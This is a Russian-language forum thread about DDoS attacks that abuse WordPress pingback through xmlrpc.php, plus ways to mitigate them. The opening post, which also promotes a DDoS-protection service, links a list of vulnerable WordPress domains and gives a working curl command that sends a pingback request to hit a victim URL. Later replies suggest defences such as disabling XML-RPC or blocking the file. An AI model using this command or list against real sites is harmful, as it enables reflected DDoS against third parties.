DDOS через WordPress (pingback)

12 3
K
На сайте с 24.03.2004
Offline
223
2881

Списочек доменов с дырявыми WP находится тут -> http://stopddos.ru/secret-wp/wordpress.txt

curl -D - "www.anywordpresssite.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>www.anywordpresssite.com/postchosen</string></value></param></params></methodCall>'

Есть мысли, как вылечить владельцев дырявых WP?

проверенная ддос защита (http://ddos-protection.ru) -> http://ddos-protection.ru (http://ddos-protection.ru), бесплатный тест, цена от размера атаки не зависит.
kxk
На сайте с 30.01.2005
Offline
990
kxk
#1

kostich, Разослать жалобы по списку хостеров, иных вариантов нет!

---------- Добавлено 27.04.2015 в 15:31 ----------

kostich, И если сказали А, как именно досят, скиньте пример хидеров что приходит жертве.

Ваш DEVOPS
K
На сайте с 24.03.2004
Offline
223
#2
kxk:

kostich, И если сказали А, как именно досят, скиньте пример хидеров что приходит жертве.

См. пример с Curl. Можешь на свой сайт через дырявый WP послать запрос и глянуть какой там хидер.

A
На сайте с 20.08.2010
Offline
775
#3

kostich, процесс осуществляется через xmlrpc.php?

K
На сайте с 24.03.2004
Offline
223
#4
awasome:
kostich, процесс осуществляется через xmlrpc.php?

именно так

N2
На сайте с 05.08.2009
Offline
98
#5

Обнаружил свой сайт в списке что делать?

A
На сайте с 20.08.2010
Offline
775
#6
Nc2009:
Обнаружил свой сайт в списке что делать?

Удалить xmlrpc.php не поможет?

Gudini
На сайте с 16.10.2004
Offline
218
#7
awasome:
Удалить xmlrpc.php не поможет?

Нет.

Когда WP обновиться он (этот файл)появиться и опять пошли по кругу.

1.Надо поставить плагин Disable XML-RPC он автоматом отключит протокол.

2.Ну и прописать в .htaccess запрет доступа всем к этому файлу, чтобы не долбились на него

/ru/forum/comment/13677004

A
На сайте с 20.08.2010
Offline
775
#8

Gudini, а вместе с ним появляется config sample и readme. Если за первый можно не переживать, то в readme.html содержится номер версии вп, поэтому при обновлении хочешь-не хочешь, а все равно полезешь удалять ненужный хлам. Потому-то я везде удалил xmlrpc.php.

Gudini
На сайте с 16.10.2004
Offline
218
#9
awasome:
Потому-то я везде удалил xmlrpc.php.

Я пока еще на стадии изучения WP и старюсь радикально не действовать.

Хотя в будущем возможно и почикаю.

Так логи почитываю периодически, вижу по ним как люди попадают при использовании определенных тем.

A
На сайте с 20.08.2010
Offline
775
#10
Gudini:
Я пока еще на стадии изучения WP и старюсь радикально не действовать.

Я как бы тоже, но в одной из тем уже писали про удаление, когда нашли какой-то баг. Я еще тогда аккуратно удалил. Кому нужен xmlrpc.php, тем придется ставить плагин, полагаю.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий